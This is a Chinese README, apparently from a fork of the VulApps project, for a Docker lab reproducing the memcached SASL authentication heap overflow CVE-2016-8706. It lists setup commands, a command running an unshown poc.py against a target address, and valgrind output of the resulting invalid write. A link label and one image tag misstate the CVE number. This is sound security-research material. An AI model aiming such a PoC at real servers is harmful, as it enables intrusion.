forked from Medicean/VulApps
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathREADME.md
109 lines (81 loc) · 3.16 KB
/
README.md
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
## Memcached Server SASL AUTENTICATION 远程代码执行漏洞(CVE-2016-8706)环境
### 说明
感谢 [@xing-xiao](https://github.com/xing-xiao) 提供原始环境。 #6
### 漏洞信息
* [CVE-2106-8706漏洞信息](http://www.talosintelligence.com/reports/TALOS-2016-0221/)
### 获取环境:
1. 拉取镜像到本地
```
$ docker pull medicean/vulapps:m_memcached_CVE-2016-8706
```
2. 启动环境
```
$ docker run -d -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8706
```
> 如果需要追溯堆栈,需在启动时 valgrind 调试 memcached,则启动环境命令如下:
```
$ docker run -i -t -u root -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8705 /valgrind.sh
```
### 使用国内阿里云镜像
1. 拉取镜像到本地
```
$ docker pull registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
```
2. 启动环境
```
$ docker run -d -p 11211:11211 registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32
```
### PoC
1. 获取目标 IP 地址与端口号,如:192.168.100.2 端口号为 11211
2. `docker ps` 查看容器ID(如获得的ID为:cfd94f8d5f93)
附加 memcached 进程用于监测结果:
```
$ docker attach cfd94f8d5f93
```
3. 执行 poc.py
```
$ python poc.py 192.168.100.2 11211
```
4. 查看结果
```
<36 Read binary protocol data:
<36 0x80 0x21 0x00 0x20
<36 0x00 0x00 0x00 0x01
<36 0x00 0x00 0x00 0x01
<36 0x41 0x41 0x41 0x41
<36 0x41 0x41 0x41 0x41
<36 0x41 0x41 0x41 0x41
authenticated() in cmd 0x21 is true
36: going from conn_parse_cmd to conn_nread
==8== Thread 3:
==8== Invalid write of size 8
==8== at 0x413432: memcpy (string3.h:53)
==8== by 0x413432: do_item_alloc (items.c:240)
==8== by 0x4097ED: process_bin_sasl_auth (memcached.c:1881)
==8== by 0x4097ED: complete_nread_binary (memcached.c:2450)
==8== by 0x4097ED: complete_nread (memcached.c:2484)
==8== by 0x40D367: drive_machine (memcached.c:4656)
==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8== by 0x414874: worker_libevent (thread.c:380)
==8== by 0x52A26B9: start_thread (pthread_create.c:333)
==8== Address 0x5d327e9 is 1,048,505 bytes inside a block of size 1,048,512 alloc'd
==8== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==8== by 0x40F9DF: memory_allocate (slabs.c:538)
==8== by 0x40F9DF: do_slabs_newslab (slabs.c:233)
==8== by 0x40FA6E: do_slabs_alloc (slabs.c:328)
==8== by 0x41007E: slabs_alloc (slabs.c:584)
==8== by 0x4131E6: do_item_alloc (items.c:180)
==8== by 0x4097ED: process_bin_sasl_auth (memcached.c:1881)
==8== by 0x4097ED: complete_nread_binary (memcached.c:2450)
==8== by 0x4097ED: complete_nread (memcached.c:2484)
==8== by 0x40D367: drive_machine (memcached.c:4656)
==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9)
==8== by 0x414874: worker_libevent (thread.c:380)
==8== by 0x52A26B9: start_thread (pthread_create.c:333)
==8==
```
> 注意:
>
> 该 PoC 并不会造成服务端崩溃。
### Exp
> 暂无命令执行 Exp,如果你愿意分享该 Exp 可向本仓库发起 [Pull Request](https://github.com/Medicean/VulApps/compare)